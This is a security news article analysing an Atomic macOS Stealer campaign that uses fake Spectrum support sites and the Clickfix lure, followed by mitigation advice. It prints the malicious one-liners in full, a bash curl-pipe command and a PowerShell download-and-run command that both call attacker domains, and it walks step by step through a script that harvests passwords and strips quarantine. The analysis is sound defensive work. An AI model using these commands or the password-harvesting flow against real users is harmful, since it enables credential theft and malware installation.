MOS macOS Stealer Uses Clickfix Exploit to Slip Past Defenses and Deliver Malware

Security researchers have uncovered a new campaign leveraging a variant of the Atomic macOS Stealer (AMOS), deploying a sophisticated blend of phishing and technical exploitation to target both consumer and corporate macOS users.

The campaign, first detected in early June 2025, uses typosquatted domains mimicking U.S. telecom provider Spectrum and exploits the Clickfix method a known social engineering tactic to deliver OS-specific payloads.

Technical Analysis: Multi-Platform Payloads and Native Abuse

The attackers set up fake Spectrum-themed websites, such as panel-spectrum[.]net and spectrum-ticket[.]net, to lure victims searching for legitimate customer support portals.

Upon visiting these sites, users are prompted to verify their identity via an “Alternative Verification” process.
Victims see a button that, when clicked, copies a command to their clipboard and displays instructions tailored to their detected operating system:

For macOS Users:

text/bin/bash -c "$(curl -fsSL https://applemacios[.]com/getrur/install.sh)"

• curl -fsSL <URL> downloads a script silently and follows redirects.
• The script is executed immediately within Bash.

install.sh – Malicious Shell Script Breakdown:

• Password Harvesting:
  1. Retrieves the current user’s name: username=$(whoami).
  2. Prompts for the “System Password” in a loop.
  3. Validates the password using dscl . -authonly.
  4. Stores the captured password in /tmp/.pass.
• Payload Download & Execution:
  1. Downloads the actual AMOS binary: curl -o /tmp/update https://applemacios[.]com/getrur/update.
  2. Removes macOS quarantine: sudo -S xattr -c /tmp/update (using the stolen password).
  3. Makes binary executable: chmod +x /tmp/update.
  4. Executes the malicious binary: /tmp/update.

Key Security Evasion Tactics:

• Abuse of native macOS utilities (dscl, sudo, xattr).
• Immediate execution of downloaded binaries, helping bypass traditional antivirus and Endpoint Detection and Response (EDR) solutions.
• Use of legitimate-looking prompts and instructions to lower suspicion.

For Windows and Linux Users:

• The delivery site serves PowerShell or incorrect instructions (e.g., “Hold Windows Key + R” shown to all users), indicating haste in infrastructure setup.

powershellpowershell -NoProfile -ExecutionPolicy Bypass -Command "$file = [System.IO.Path]::Combine($env:TEMP, 'api.ps1'); Invoke-WebRequest -Uri 'https://cf-verifi[.]pages[.]dev/i.txt' -OutFile $file; & $file"

Attribution, Indicators, and Infrastructure Flaws

Analysis of the campaign revealed Russian-language comments embedded in the delivery page source code, suggesting involvement of Russian-speaking cybercriminals.

The infrastructure is notably sloppy, with mismatched platform instructions and shared commands for disparate operating systems a tactic that may undermine the campaign’s stealth but enables rapid, wide deployment.

Key Indicators of Compromise (IOCs):

Impact and Mitigation Guidance

Risks to Organizations

• Credential Theft: Stolen macOS system passwords can be used to compromise enterprise VPNs, cloud accounts, and internal systems.
• Bypass of Security Tools: By abusing system commands and legitimate utilities, detection is significantly hindered.
• Potential for Lateral Movement and Ransomware: Credentials and persistent access pave the way for deeper intrusions, data theft, or ransomware deployment.

Defensive Best Practices

1. User Awareness: Train staff to recognize social engineering, especially bogus “system verification” prompts.
2. Endpoint Hardening: Enforce Gatekeeper, disallow unsigned scripts, and use Mobile Device Management (MDM) to lock down macOS systems.
3. Threat Hunting: Actively monitor for suspicious password prompt loops, misuse of dscl, and known AMOS IOCs.
4. Incident Response: Isolate affected endpoints and reset compromised credentials immediately.

The AMOS stealer’s use of Clickfix, native macOS commands, and hastily assembled typosquatting infrastructure highlights the escalating sophistication and opportunism in multi-platform social engineering.

Vigilant user education and proactive technical controls are vital to staying ahead of these fast-moving threats.